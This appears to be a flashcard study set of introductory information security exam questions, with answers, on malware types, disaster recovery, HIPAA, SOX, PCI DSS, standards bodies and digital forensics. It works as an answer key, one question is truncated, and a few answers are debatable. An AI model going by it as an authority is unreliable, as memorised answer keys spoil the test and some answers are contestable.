Which type of virus targets computer hardware and software startup functions? Hardware infector System infector File infector Data infector

System infector

What type of security monitoring tool would be most likely to identify an unauthorized change to a computer system? Network intrusion detection system (IDS) System integrity monitoring Closed-circuit TV Data loss prevention

System integrity monitoring

Ben is working toward a position as a senior security administrator. He would like to earn his first International Information Systems Security Certification Consortium (ISC)2 certification. Which certification is most appropriate for his needs? Systems Security Certified Practitioner (SSCP) Certified Information Systems Security Professional (CISSP) Certified Secure Software Lifecycle Professional (CSSLP) Certified Cloud Security Professional (CCSP)

Systems Security Certified Practitioner (SSCP)

Susan is a digital forensic examiner. She is investigating a case in which a driver has been accused of vehicular homicide. She has the driver's mobile device and cellular records. What type of mobile device evidence is most likely to reveal whether the driver was actively using a mobile device when the incident occurred? Global positioning system (GPS) information and history Network connection information and history Text messages Device information

Text messages

Which of the following is not true of contingency planning? The maximum tolerable downtime (MTD) is the maximum period of time that a business can survive a disabled critical function. The recovery time objective (RTO) is the amount of time needed to recover a business process. It is often made up of several interlinked RTOs. The recovery point objective (RPO) is the point to which data must be recovered. The mean time between failures (MTBF) is closely associated with the recovery time objecti

The mean time between failures (MTBF) is closely associated with the recovery time objectives (RTOs) of several integrated critical business functions (CBFs).

How are the Health Insurance Portability and Accountability Act (HIPAA) and Payment Card Industry Data Security Standard (PCI DSS) alike? They both focus on the health care industry. They both have requirements that protect the confidentiality, integrity, and availability of data. The same federal agencies have oversight over both HIPAA and PCI DSS. They have similar scopes.

They both have requirements that protect the confidentiality, integrity, and availability of data.

Under the Health Insurance Portability and Accountability Act (HIPAA) Privacy Rule, covered entities may not use or disclose people's protected health information (PHI) without their written consent, although there are exceptions. Which of the following is generally not an allowed exception under the Privacy Rule? To provide medical treatment To process payment To discuss a patient's medical status at a conference To report victims of child abuse and neglect

To discuss a patient's medical status at a conference

The Internet Engineering Task Force (IETF) works closely with the World Wide Web Consortium (W3C) and the International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC) focusing on which of the following? Special Publications (SPs) Transmission Control Protocol/Internet Protocol (TCP/IP) ISO standard ISO/IEC 27002

Transmission Control Protocol/Internet Protocol (TCP/IP)

Lin installed a time-management utility that she downloaded from the Internet. Now several applications are not responding to normal commands. What type of malware did she likely encounter? Virus Worm Ransomware Trojan horse

Trojan horse

True or False? Regarding disaster recovery, an alternate processing center or mirrored site is always ready and under the organization's control.

True

True or False? A Faraday bag stops any electromagnetic emanations from passing into or out of the bag, preventing a mobile device from communicating with the outside world.

True

True or False? A backdoor is a hidden way to bypass access controls and allow access to a system or resource.

True

True or False? A blanket purchase agreement (BPA) creates preapproved accounts with qualified suppliers to fulfill recurring orders for products or services.

True

True or False? A certification is an official statement that validates that a person has satisfied specific job requirements.

True

True or False? A computer virus is an executable program that attaches to, or infects, other executable programs.

True

True or False? A functional policy declares an organization's management direction for security in such specific functional areas as email use, remote access, and Internet interaction (including social media).

True

True or False? A network engineer in the United States who needs guidance on information security systems could consult the National Institute of Standards and Technology (NIST) Special Publications 800 series.

True

True or False? A parallel test of a contingency plan is the same as a full-interruption test except that processing does not stop at the primary site.

True

True or False? A rootkit is a type of malware that modifies or replaces one or more existing programs to hide the fact that a computer has been compromised.

True

True or False? A security awareness program should address the requirements and expectations of an organization's security policy.

True

True or False? A successful business impact analysis (BIA) maps the context, the critical business functions (CBFs), and the processes on which they rely.

True

True or False? After audit activities are completed, auditors perform data analysis.

True

True or False? American Institute of Certified Public Accountants (AICPA) Service Organization Control (SOC) 2 reports are commonly implemented for service providers, hosted data centers, and managed cloud computing providers.

True

True or False? An American Institute of Certified Public Accountants (AICPA) Service Organization Control (SOC) 1 report is commonly implemented for organizations that must comply with Sarbanes-Oxley (SOX) or the Gramm-Leach-Bliley Act (GLBA).

True

True or False? An auditing benchmark is the standard by which a system is compared to determine whether it is securely configured.

True

True or False? An example of a nonaccess computer crime is crashing a target's critical functionality to prevent normal (revenue-creating) processes from occurring.

True

True or False? An organization can maintain a cloud-based disaster recovery site for a fraction of the cost of a physical site.

True

True or False? Any component that, if it fails, could interrupt business processing is called a single point of failure (SPOF).

True

True or False? Attackers have established thousands of botnets, which they use to distribute malware and spam and to launch denial of service (DoS) attacks against organizations or even countries.

True

True or False? Attacks against confidentiality and privacy, data integrity, and availability of services are all ways malicious code can threaten businesses.

True

True or False? Because people inside an organization generally have more detailed knowledge of the IT infrastructure than outsiders do, they can place logic bombs more easily.

True

True or False? Business continuity management includes business continuity planning, disaster recovery planning, crisis management, incident response management, and risk management.

True

True or False? Certified Internet Web Professional (CIW) offers several credentials that focus on both general and web-related security.

True

True or False? Company-related classifications are not standard; therefore, there may be some differences of meaning between the terms "private" and "confidential" in different companies.

True

True or False? Compliance includes the actual state of being compliant as well as the steps and processes taken to become compliant.

True

True or False? Data loss prevention (DLP) uses business rules to classify sensitive information to prevent unauthorized end users from sharing it.

True

True or False? Defense in depth is the practice of layering defenses to increase overall security and provide more reaction time to respond to incidents.

True

True or False? Digital forensics is the process of using well-defined analytical and investigative techniques to guide the processes of collecting and examining evidence related to a computer security incident.

True

True or False? During an IT audit, security controls are checked to ensure they are effective, reliable, and functioning as required and expected.

True

True or False? During the planning and execution phases of an audit, an auditor will most likely review risk analysis output.

True

True or False? E-discovery is an iterative process of examining storage media, searching for items of interest, identifying likely items that may have value as evidence, and then recovering those items.

True

True or False? Even if a mobile device is deemed not to be a direct part of a crime or incident, its ability to record the environment of an attacker during the incident could be material.

True

True or False? Examples of major disruptions include extreme weather, application failure, and criminal activity.

True

True or False? Fault-tolerance options are not replacements for data backups.

True

True or False? Generally, once evidence becomes inadmissible, it cannot be fixed.

True

True or False? ISO/IEC 27002 provides organizations with best-practice recommendations on information security management.

True

True or False? In an incremental backup, you start with a full backup when network traffic is light. Then, each night, you back up only that day's changes.

True

True or False? In remote journaling, a system writes a log of online transactions to an offsite location.

True

True or False? Juniper Networks offers vendor-specific certifications for its networking product line.

True

True or False? One of the goals of the American National Standards Institute (ANSI) is to ensure the safety and health of consumers and the protection of the environment.

True

True or False? One requirement of the GIAC Security Expert (GSE) credential is that candidates must hold three GIAC credentials, with two of the credentials being Gold.

True

True or False? Patching computers and devices with the latest security fixes makes them more resistant to many types of attacks.

True

True or False? Policies that cover data management should cover transitions throughout the data's life cycle.

True

True or False? Procedures help enforce the intent of a policy.

True

True or False? Protected health information (PHI) is any individually identifiable information about a person's health.

True

True or False? RSA provides security, risk, and compliance solutions for enterprise environments.

True

True or False? Regarding an intrusion detection system (IDS), stateful matching looks for specific sequences appearing across several packets in a traffic stream, rather than just in individual packets.

True

True or False? Sarbanes-Oxley Act (SOX) Section 404 requires an organization's executive officers to establish, maintain, review, and report on the effectiveness of the company's internal controls over financial reporting (ICFR).

True

True or False? Schools and libraries that must comply with the Children's Internet Protection Act (CIPA) must also have some way to allow adults unfiltered Internet access.

True

True or False? Schools that violate the Family Educational Rights and Privacy Act (FERPA) can lose their federal funding.

True

True or False? Security breaches perpetrated by current and former employees often go undetected due to weak personnel and security policies or ineffective countermeasures.

True

True or False? Standards are mandated requirements for hardware and software solutions used to address security risk throughout an organization.

True

True or False? Standards provide guidelines to ensure that products in today's computing environments work together.

True

True or False? Stealth viruses attack countermeasures, such as antivirus signature files or integrity databases, by searching for these data files and deleting or altering them.

True

True or False? The (ISC)2 Certified Cloud Security Professional (CCSP) certification was created by both (ISC)2 and the Cloud Security Alliance (CSA).

True

True or False? The Common Criteria is a set of system procurement standards used by several countries.

True

True or False? The Federal Information Security Modernization Act (FISMA) of 2014 assigned the Department of Homeland Security (DHS) the responsibility for developing, implementing, and ensuring federal government-wide compliance as per FISMA information security policies, procedures, and security controls.

True

True or False? The Gramm-Leach-Bliley Act (GLBA) Privacy Rule requires that consumers have a chance to opt out of certain types of data sharing with nonaffiliated third parties.

True

True or False? The Institute of Electrical and Electronics Engineers (IEEE) develops and distributes standards that relate to electricity and electronics.

True

True or False? The International Electrotechnical Commission (IEC) is the preeminent organization for developing and publishing international standards for technologies related to electrical and electronic devices and processes.

True

True or False? The International Electrotechnical Commission (IEC) was instrumental in the development of standards for electrical measurements, including gauss, hertz, and weber.

True

True or False? The International Telecommunication Union (ITU) was formed in 1865 as the International Telegraph Union to develop international standards for the emerging telegraph communications industry.

True

True or False? The Internet Architecture Board (IAB) is a subcommittee of the Internet Engineering Task Force (IETF).

True

True or False? The Internet Architecture Board (IAB) serves as an advisory body to the Internet Society (ISOC).

True

True or False? The Internet Engineering Task Force (IETF) is a collection of working groups, and each working group addresses a specific topic.

True

True or False? The Sarbanes-Oxley Act (SOX) was passed after several large corporate scandals revealed fraud and shook investor confidence.

True

True or False? The United States does not have one comprehensive data protection law; instead, it has many laws that focus on different types of data found in different vertical industries.

True

True or False? The emergency operations center (EOC) is the place where an organization's recovery team will meet and work during a disruption.

True

True or False? The function of homepage hijacking is to change a browser's homepage to point to the attacker's site.

True

True or False? The goal of a command injection is to execute commands on a host operating system.

True

True or False? The idea that users should be granted only the levels of permissions they need to perform their duties is called the principle of least privilege.

True

True or False? The purpose of the Children's Online Privacy Protection Act of 1998 (COPPA) is to restrict the online collection of personal information of children under 13 years of age.

True

True or False? The recovery point objective (RPO) can come from the business impact analysis (BIA) or sometimes from a government mandate, such as banking laws.

True

True or False? The success of Trojans is due to their reliance on social engineering to spread and operate; they have to trick users into running them.

True

True or False? The term "web defacement" refers to someone gaining unauthorized access to a web server and altering the index page of a site on the server.

True

True or False? Time stamps correspond to computer log files to help coordinate a sequence of events and are accurate to at least the second.

True

True or False? Two common methods to protect evidence during imaging are to use forensic software that forces read-only mode or connect the evidence device using a hardware interface that blocks any write operations.

True

True or False? Under Securities and Exchange Commission (SEC) rules, internal controls over financial reporting (ICFR) are processes that provide reasonable assurance that an organization's financial reports are reliable.

True

True or False? Under the Federal Information Security Management Act (FISMA), all federal agencies must report security incidents to the U.S. Computer Emergency Readiness Team (US-CERT).

True

True or False? Unlike viruses, worms do not require a host program to survive and replicate.

True

True or False? Using the names of superiors to convince another person that a higher authority has allowed access to information is a form of social engineering.

True

True or False? Visa, MasterCard, and other payment card vendors helped to create the Payment Card Industry Data Security Standard (PCI DSS).

True

True or False? When planning an IT audit, one must ensure that the areas not reviewed in the current audit will be subject to another audit.

True

True or False? While running business operations at an alternate site, you must continue to make backups of data and systems.

True

True or False? World Wide Web Consortium (W3C) standards and specifications ensure that web applications interact with web components from other vendors.

True

What is not a typical sign of virus activity on a system? Unexplained decrease in available disk space Unexpected error messages Unexpected power failures Sudden sluggishness of applications

Unexpected power failures

Wen is a network security professional. He wants to strengthen the security of his agency's network infrastructure defenses. Which control can he use to protect the network? Require scanning of all removable media Use proxy services and bastion hosts to protect critical services Ensure that all operating systems have been patched with the latest updates from vendors Disable any unnecessary operating system services and processes that may pose a security vulnerability

Use proxy services and bastion hosts to protect critical services

What tool might be used by an attacker during the reconnaissance phase of an attack to glean information about domain registrations? Whois Simple Network Management Protocol (SNMP) Ping Domain Name System (DNS)

Whois

Marco is in a web development program. He is studying various web-related standards that apply to Cascading Style Sheets (CSS) and HyperText Markup Language (HTML). What authoritative source should he consult? International Electrotechnical Commission (IEC) Internet Engineering Task Force (IETF) International Organization for Standardization (ISO) World Wide Web Consortium (W3C)

World Wide Web Consortium (W3C)

Hacking groups create _______ to launch attacks whereby they infect vulnerable machines with agents that perform various functions at the command of the controller. logic bombs honeypots ransomware botnets

botnets

A(n) _________ is an event that prevents a critical business function (CBF) from operating for a period greater than the maximum tolerable downtime (MTD). incident violation disaster contingency

disaster

Leola is a cybersecurity consultant hired by a company to test the effectiveness of its network's defenses. She has something in common with the malicious people who would perform the same tasks involved in _________________, except that, unlike Leola, they would not have consent to perform this action against the system. stateful matching penetration testing network access control system hardening

penetration testing


Ensembles d'études connexes

Business Law Chapter 22 Questions

View Set

D.2 Stellar characteristics and stellar evolution

View Set

Chapter 8-16 Services Marketing Final Exam

View Set

Virginia Real Estate Law (11th Edition)

View Set

Legal and Ethical Aspects of Health Information Management- Ch 4 Exam

View Set

Accounting chapter 11 (stock and dividends)

View Set

Use of English Part 2 Test 5 A sting in the tale

View Set